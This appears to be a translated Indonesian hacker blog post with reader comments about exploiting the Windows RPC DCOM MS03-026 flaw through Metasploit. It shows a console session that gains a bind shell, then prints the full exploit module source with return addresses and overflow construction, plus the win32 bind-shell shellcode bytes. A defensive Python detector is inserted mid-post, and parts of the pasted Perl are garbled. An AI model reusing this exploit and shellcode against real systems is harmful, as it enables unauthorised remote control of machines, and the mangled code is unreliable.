#k-elektronik, #yogyafree, #xcode, #sekuritionline,
#jasakom, #unsecured and all underground channels @DALnet
#nyubicrew @irc.mildnet.org
- k1tk4t, mR.opt1lc, Pushm0v, gh0z, sakitjiwa, cybertank, m_beben,
matdhule, shideX, t0ngkring, th3sn0wbr4in, y3d1ps, the_day,
lirva32, ayulina, dark|ipl, digital-levi, bledhek, hzent,
tw, kopral;p, natztel, alkahfi;p, si Om, PakRT, timin,
kopasus, scriptdana, why, vindie, raiden, irving_nazmi,
Ph03n1X, primadonal, cR45H3R, aulia, sat-anichell, thesims,
adhietslank, cyberlog, letjen et al., boerz, bigie, camgenta,
the_rumput_kering, lppsmes, sendenk, bigmaster, kendi et al.,
mbah scut;), the_peng and others who can't all be named..
- and all of my friends who can't be named one by one, both at home
and abroad ;)
Reference: google.com, peer-to-peer experiment between a PC and a laptop..
http://metasploit.com, ezine[at]echo.or.id.
-----===== Alhamdulillahirabbil'alamiin =====-----
send criticism && suggestions to fl3xu5[at]fl3xu5.web.id
What if, in C:\WINDOWS\system32\drivers\etc>services,
port 135 were swapped to another port number, would it still work?
In the RPC process, at which point does it jump to Admin privilege?
@Nemo:
I'll try to share something related to Nemo's question.
[*] Starting the Metasploit Framework…
+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5
RHOST -> 172.16.0.5
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Got connection from 172.16.0.3:3766 172.16.0.5:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd \
cd \
C:\>exit
exit
[*] Exiting Bind Handler.
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 177
RPORT -> 177
msf msrpc_dcom_ms03_026(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
——– —— ————– ——————
required RHOST 172.16.0.5 The target address
required RPORT 177 The target port
Payload: Name Default Description
——– ——– ——- ——————————————
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
Target: Windows NT SP3-6a/2K/XP/2K3 English ALL
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Exiting Bind Handler.
you can see there that when the port is changed to another port, e.g.
port 177, the exploitation fails.
from my analysis, exploitation with rpc dcom uses port 135, which is the
hole in Microsoft WinXP SP1.
when the port is changed to another port, that port no longer matches the
port the msrpc_dcom_ms03_026 exploit is going to use, so the exploitation
fails.
the information about msrpc_dcom_ms03_026 can be seen here:
*look at the port that is used
msf > info msrpc_dcom_ms03_026
Name: Microsoft RPC DCOM MSO3-026
Class: remote
Version: $Rev: 3818 $
Target OS: win32, win2000, winnt, winxp, win2003
Keywords: dcom
Privileged: Yes
Disclosure: Jul 16 2003
Provided By:
H D Moore
spoonm
Brian Caswell
Available Targets:
Windows NT SP3-6a/2K/XP/2K3 English ALL
Available Options:
Exploit: Name Default Description
——– —— ——- ——————
required RHOST The target address
required RPORT 135 The target port
Payload Information:
Space: 880
Avoid: 7 characters
| Keys: noconn tunnel bind ws2ord reverse
Nop Information:
SaveRegs: esp ebp
| Keys:
Encoder Information:
| Keys:
Description:
This module exploits a stack overflow in the RPCSS service, this
vulnerability was originally found by the Last Stage of Delirium
research group and has been widely exploited ever since. This
module can exploit the English versions of Windows NT 4.0 SP3-6a,
Windows 2000, Windows XP, and Windows 2003 all in one request 🙂
References:
http://www.osvdb.org/2100
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.milw0rm.com/metasploit/42
you can see that the port the exploit is going to use is port 135.
that information also shows that this exploit can jump straight to admin
privilege.
see above: Privileged: Yes,
where the exploit exploits a stack overflow in the RPCSS service, and can
exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000,
Windows XP, and Windows 2003.
see the description.
CMIIW :)
*for problems/discussion about stack overflows and the RPCSS service,
search google.
if I'm not mistaken, Cyb3rh3b once wrote about stack overflows.
---addition:
for those who like analyzing "code", here is the program code of
msrpc_dcom_ms03_026 and win32_bind that I took from the metasploit v2.7
tool
*Please read and study it carefully ;p
msf > cat msrpc_dcom_ms03_026.pm
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::msrpc_dcom_ms03_026;
use strict;
use base "Msf::Exploit";

use Pex::DCERPC;
use Pex::NDR;
use Pex::Text;
use Pex::x86;

my $advanced = {
    'FragSize'    => [ 256, 'The DCERPC fragment size' ],
    'BindEvasion' => [ 0, 'IDS Evasion of the Bind request' ],
};

my $info = {
    'Name'    => 'Microsoft RPC DCOM MSO3-026',
    'Version' => '$Rev: 3818 $',
    'Authors' => [
        'H D Moore ',
        'spoonm ',
        'Brian Caswell '
    ],
    'Arch'     => ['x86'],
    'OS'       => [ 'win32', 'win2000', 'winnt', 'winxp', 'win2003' ],
    'Priv'     => 1,
    'AutoOpts' => { 'EXITFUNC' => 'thread' },
    'UserOpts' => {
        'RHOST' => [ 1, 'ADDR', 'The target address' ],
        'RPORT' => [ 1, 'PORT', 'The target port', 135 ],
    },
    'Payload' => {
        'Space'    => 880,
        'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
        'Keys'     => ['+ws2ord'],
    },
    'Description' => Pex::Text::Freeform(
        qq{
        This module exploits a stack overflow in the RPCSS service, this vulnerability
        was originally found by the Last Stage of Delirium research group and has been
        widely exploited ever since. This module can exploit the English versions of
        Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
        }
    ),
    'Refs' => [ [ 'OSVDB', '2100' ], [ 'MSB', 'MS03-026' ], [ 'MIL', '42' ], ],
    'DefaultTarget' => 0,
    'Targets' => [
        [
            'Windows NT SP3-6a/2K/XP/2K3 English ALL',
            0x77f33723, # Windows NT 4.0 SP6a (esp)
            0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
            0x0018759f, # Windows 2000 Universal (ebx)
            0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
            0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls - thanks Litchfield!)
            0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
            0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
        ],
    ],
    'Keys' => ['dcom'],
    'DisclosureDate' => 'Jul 16 2003',
};

sub new {
    my $class = shift;
    my $self =
      $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
    return ($self);
}

sub Build {
    my ($self) = @_;
    my $target_idx = $self->GetVar('TARGET');
    my $shellcode  = $self->GetVar('EncodedPayload')->Payload;
    my $target     = $self->Targets->[$target_idx];

    if ( !$self->InitNops(128) ) {
        $self->PrintLine("[*] Failed to initialize the nop module.");
        return;
    }

    ##
    # The following was inspired by Dino Dai Zovi's description of his exploit
    ##

    # 360 is a magic number for cross-OS exploitation :)
    my $xpseh = Pex::Text::EnglishText(360);

    # Jump to [esp-4] - (distance to shellcode)
    my $jmpsc = "\x8b\x44\x24\xfc" .    # mov eax,[esp-0x4]
      "\x05\xe0\xfa\xff\xff" .          # add eax,0xfffffae0 (sub eax, 1312)
      "\xff\xe0";                       # jmp eax

    # Jump to [ebp+0x30] - (distance to shellcode) - thanks again Litchfield!
    my $jmpsc2k3 = "\x8b\x45\x30" .     # mov eax,[ebp+0x30]
      "\x05\x24\xfb\xff\xff" .          # add eax,0xfffffb24 (sub 1244)
      "\xff\xe0";                       # jmp eax

    # Windows 2003 added by spoonm
    substr( $xpseh, 246 - length($jmpsc2k3), length($jmpsc2k3), $jmpsc2k3 );
    substr( $xpseh, 246, 2,
        Pex::x86::JmpShort( '$+' . ( -1 * length($jmpsc2k3) ) ) );
    substr( $xpseh, 250, 4, pack( 'V', $target->[5] ) );

    substr( $xpseh, 306, 2, "\xeb\x06" );
    substr( $xpseh, 310, 4, pack( 'V', $target->[4] ) );
    substr( $xpseh, 314, length($jmpsc), $jmpsc );

    ##
    # NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
    # NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
    # HD wrote NT 4.0 SP6a, and it's off in a different place
#
# Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
# (hopefully I’m accurate, this is from my memory…)
#
# |—pop pop ret——– –eax—|
# V | | V
# [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
# 4 4 4 5 5
# | ^
# ————————————————–|
# The jmpback’s all are 5 byte backwards jumps into our shellcode that
# sits just below these overwrites…
##
my $nt4sp3jmp =
Pex::x86::JmpShort( ‘$+’ . ( 12 + 5 ) )
. Pex::Text::RandomChars( 2, $self->PayloadBadChars );
my $nt4sp5jmpback = “xe9” . pack( ‘V’, -( 5 + 4 + length($shellcode) ) );
my $nt4sp3jmpback =
“xe9” . pack( ‘V’, -( 12 + 5 + 5 + length($shellcode) ) );
my $ntshiz = $nt4sp3jmp
. pack( ‘V’, $target->[7] )
. pack( ‘V’, $target->[6] )
. $nt4sp5jmpback
. $nt4sp3jmpback;
# Pad to the magic value of 118 bytes
$ntshiz .=
Pex::Text::RandomChars( 118 – length($ntshiz), $self->PayloadBadChars );
# Create the evil UNC path used in the overflow
my $uncpath =
“x5cx00x5cx00”
. $self->MakeNops(32)
. “xebx10xebx19”
. # When attacking NT 4.0, jump over 2000/XP return
pack( “V”, $target->[3] ) . # Return address for 2000 (ebx)
pack( “V”, $target->[1] ) . # Return address for NT 4.0 (esi)
pack( “V”, $target->[2] ) . # Writable address on 2000 and jmp for NT 4.0
$self->MakeNops(88)
. “xebx04xffxffxffxff”
. $self->MakeNops(8)
. “xebx04xebx04”
. $self->MakeNops(4)
. “xebx04xffxffxffxff”
. $shellcode
. $ntshiz
. $xpseh
. “x5cx00x41x00x00x00x00x00x00x00”;
# This is the rpc cruft needed to trigger the vuln API
my $stub =
Pex::NDR::Short(5)
. Pex::NDR::Short(1)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::Text::RandomData(16)
. # UUID
Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::UnicodeConformantVaryingStringPreBuilt($uncpath)
.
Pex::NDR::Long(0)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) );
return $stub;
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar(‘RHOST’);
my $target_port = $self->GetVar(‘RPORT’);
my $uuid = ‘4d9f4ab8-7d1c-11cf-861e-0020af6e7c57’;
my $version = ‘0.0’;
my $handle =
Pex::DCERPC::build_handle( $uuid, $version, ‘ncacn_ip_tcp’, $target_host,
$target_port );
my $dce = Pex::DCERPC->new(
‘handle’ => $handle,
‘fragsize’ => $self->GetVar(‘FragSize’),
‘bindevasion’ => $self->GetVar(‘BindEvasion’),
);
if ( !$dce ) {
$self->PrintLine(“[*] Could not bind to $handle”);
return;
}
my $stub = $self->Build();
if ( !$stub ) {
$self->PrintLine(‘[*] unable to create request’);
}
$self->PrintLine(‘[*] Sending request…’);
my @response = $dce->request( $handle, 0, $stub );
if (@response) {
$self->PrintLine(‘[*] RPC server responded with:’);
foreach my $line (@response) {
$self->PrintLine( ‘[*] ‘ . $line );
}
$self->PrintLine(‘[*] This probably means that the system is patched’);
}
return;
}
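The Exploit sub above binds to the ISystemActivator interface UUID over TCP 135 and then sends a RemoteActivation request (opnum 0) whose server-name string carries the overflow. The following Python detector, added here as an example and not part of the post or of Metasploit, parses DCERPC bind and request PDUs, tracks which context id was bound to that UUID, and flags opnum 0 requests whose server name is implausibly long. The PDU builders, the 52-byte fixed stub prefix mirrored from Build(), the conformant-varying-string header layout and the 64-character threshold are assumptions made for the constructed sample.

```python
import struct
import uuid

# Interface UUID from the module's Exploit sub; NDR transfer syntax is the standard one.
ISYSTEMACTIVATOR = uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57")
NDR32 = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
PTYPE_REQUEST, PTYPE_BIND = 0, 11
MAX_SANE_UNC_CHARS = 64   # assumed: a genuine server name is far shorter than this

def dcerpc_header(ptype, body, call_id=1):
    """16-byte common header: ver 5.0, ptype, first|last flags, LE drep, frag_len, auth_len 0."""
    return struct.pack("<BBBBIHHI", 5, 0, ptype, 0x03, 0x10, 16 + len(body), 0, call_id) + body

def build_bind(iface, ctx_id=0):
    """Bind PDU with a single presentation context for `iface` (constructed)."""
    body = struct.pack("<HHI", 5840, 5840, 0) + struct.pack("<B3x", 1)   # one ctx element
    body += struct.pack("<HBx", ctx_id, 1)                               # one transfer syntax
    body += iface.bytes_le + struct.pack("<I", 0)                        # abstract syntax v0.0
    body += NDR32.bytes_le + struct.pack("<I", 2)                        # NDR v2.0
    return dcerpc_header(PTYPE_BIND, body)

def build_request(ctx_id, opnum, stub):
    """Request PDU: alloc_hint, ctx_id, opnum, then the NDR stub (constructed)."""
    return dcerpc_header(PTYPE_REQUEST, struct.pack("<IHH", len(stub), ctx_id, opnum) + stub)

def parse_pdu(data):
    """Return (ptype, call_id, body) for one DCERPC v5 PDU."""
    vers, _, ptype, _, _, frag_len, _, call_id = struct.unpack_from("<BBBBIHHI", data, 0)
    if vers != 5 or frag_len > len(data):
        raise ValueError("not a DCERPC v5 PDU")
    return ptype, call_id, data[16:frag_len]

def bound_interfaces(body):
    """Map each context id in a bind body to its abstract interface UUID."""
    ctxs, off = {}, 12
    for _ in range(body[8]):
        ctx_id, n_ts = struct.unpack_from("<HBx", body, off)
        ctxs[ctx_id] = uuid.UUID(bytes_le=bytes(body[off + 4:off + 20]))
        off += 24 + 20 * n_ts                 # element = 4 + abstract(20) + n * transfer(20)
    return ctxs

def unc_char_count(stub):
    """actual_count of the server-name string; assumes the 52-byte fixed prefix
    seen in Build() followed by a conformant varying string header."""
    if len(stub) < 64:
        return None
    _max_count, _offset, actual = struct.unpack_from("<III", stub, 52)
    return actual

def detect_ms03_026(pdus):
    """Findings over the client->server PDUs of one TCP/135 session."""
    findings, ctxs = [], {}
    for pdu in pdus:
        ptype, call_id, body = parse_pdu(pdu)
        if ptype == PTYPE_BIND:
            ctxs.update(bound_interfaces(body))
            if ISYSTEMACTIVATOR in ctxs.values():
                findings.append("bind to ISystemActivator")
        elif ptype == PTYPE_REQUEST:
            _hint, ctx_id, opnum = struct.unpack_from("<IHH", body, 0)
            if ctxs.get(ctx_id) == ISYSTEMACTIVATOR and opnum == 0:   # RemoteActivation
                n = unc_char_count(body[8:])
                if n is not None and n > MAX_SANE_UNC_CHARS:
                    findings.append(f"RemoteActivation with {n}-char server name (call {call_id})")
    return findings

def sample_session(unc_chars, iface=ISYSTEMACTIVATOR):
    """Constructed bind + request; the server name is harmless filler of the
    given length, not the module's overflow bytes."""
    name = ("\\\\" + "A" * (unc_chars - 2)).encode("utf-16-le")
    stub = struct.pack("<HHII", 5, 1, 0, 0) + b"\x00" * 40          # 52-byte fixed prefix
    stub += struct.pack("<III", unc_chars, 0, unc_chars) + name
    return [build_bind(iface), build_request(0, 0, stub)]

if __name__ == "__main__":
    print(detect_ms03_026(sample_session(12)))    # benign-length name: bind finding only
    print(detect_ms03_026(sample_session(300)))   # overlong name: both findings
```

A bind to ISystemActivator alone is normal DCOM traffic; the second finding is the one worth alerting on, and on an unpatched host it is the last thing seen before RPCSS crashes.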
msf > cat win32_bind.pm
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Payload::win32_bind;
use strict;
use base 'Msf::PayloadComponent::Windows::Payload';

my $info = {
    'Name'        => 'Windows Bind Shell',
    'Version'     => '$Revision: 2067 $',
    'Description' => 'Listen for connection and spawn a shell',
    'Authors'     => [ 'vlad902', ],
    'Arch'        => ['x86'],
    'Priv'        => 0,
    'OS'          => ['win32'],
    'Size'        => '',
    'Payload'     => {
        # Byte offsets patched at run time: LPORT as a big-endian short,
        # EXITFUNC as a little-endian long
        Offsets => {
            'LPORT'    => [ 162, 'n' ],
            'EXITFUNC' => [ 308, 'V' ]
        },
        Payload =>
            "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" .
            "\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" .
            "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
            "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" .
            "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" .
            "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" .
            "\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" .
            "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" .
            "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" .
            "\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" .
            "\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" .
            "\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" .
            "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" .
            "\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" .
            "\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" .
            "\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" .
            "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" .
            "\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" .
            "\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" .
            "\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" .
            "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" .
            "\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" .
            "\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" .
            "\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" .
            "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" .
            "\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" .
            "\x53\xff\xd6\xff\xd0",
    },
};

sub _Load {
    Msf::PayloadComponent::Windows::Payload->_Import('Msf::PayloadComponent::BindConnection');
}

sub new {
    my $class = shift;
    my $hash  = @_ ? shift : {};
    my $self;
    _Load();
    $hash = $class->MergeHashRec( $hash, { 'Info' => $info } );
    $self = $class->SUPER::new( $hash, @_ );
    return ($self);
}
1;
---== Warm regards, ===---
fl3xu5
Wow... bro primadonal is here too, eh.. 🙂
What about on Win 2000?? Oh, and happy Eid al-Fitr
@han: same here, bro.
Yup, happy Eid al-Fitr to you too 🙂
Whoa,,, so long,, tiring to read,, 😀
If you write another one, make it simpler, ok,,, btw, nice.,, ^^
@scratchz: wow, thanks for the suggestion, bro 🙂
btw this was deliberately made detailed so it's a bit clearer 🙂
A very interesting article bro... it makes me care more about security on Windows.. I also want to try exploring Metasploit further.... Keep on writing bro.... 🙂
@irving: thx bro.. go ahead and explore, bro, and share it with me later, ok 🙂
Wow, really cool, the discussion is thorough.... BTW I tried it on my laptop with Win XP SP2 and it didn't work, even though it's a standard fresh install... a pirated copy too :p no patches at all.... what's going on, flexus...
please enlighten me.......
thanx a lot for sharing......:)
In general, Windows XP SP2 indeed doesn't work.
Yesterday I got to try exploiting an unpatched XP SP2.. using peercast_url_win32 and it succeeded.
Please try again ..:)
Here is the info from peercast_url_win32:
Bro, I want to ask.. when I try to map a network drive.. why does it ask for a username and password.. do I have to create a guest user first?
Well, make sure a user in the administrators group has been created to access the network drive.
Wow, so the prevention requires restarting the computer first?
Then it can't be applied at an internet cafe.
Most internet cafes use DeepFreeze 🙁
I'm going to copy-paste this, ok.......
thanks
Go ahead, as long as you still include the source 🙂
Awesome, bro..
but btw, why when I type
msf> use msrpc_dcom_ms03_026
does the message [-] failed to load module: msrpc_dcom_ms03_026 appear
what do you think causes it to fail to load, sir?
I'm using metasploit v3.7
whereas usually when I use
use windows_smb_ms08_067_netapi
it works.. hehe
hmm... confused.. 😀
newbie asking for enlightenment 😀
sorry, my mistake..
windows/smb/ms08_067_netapi
😀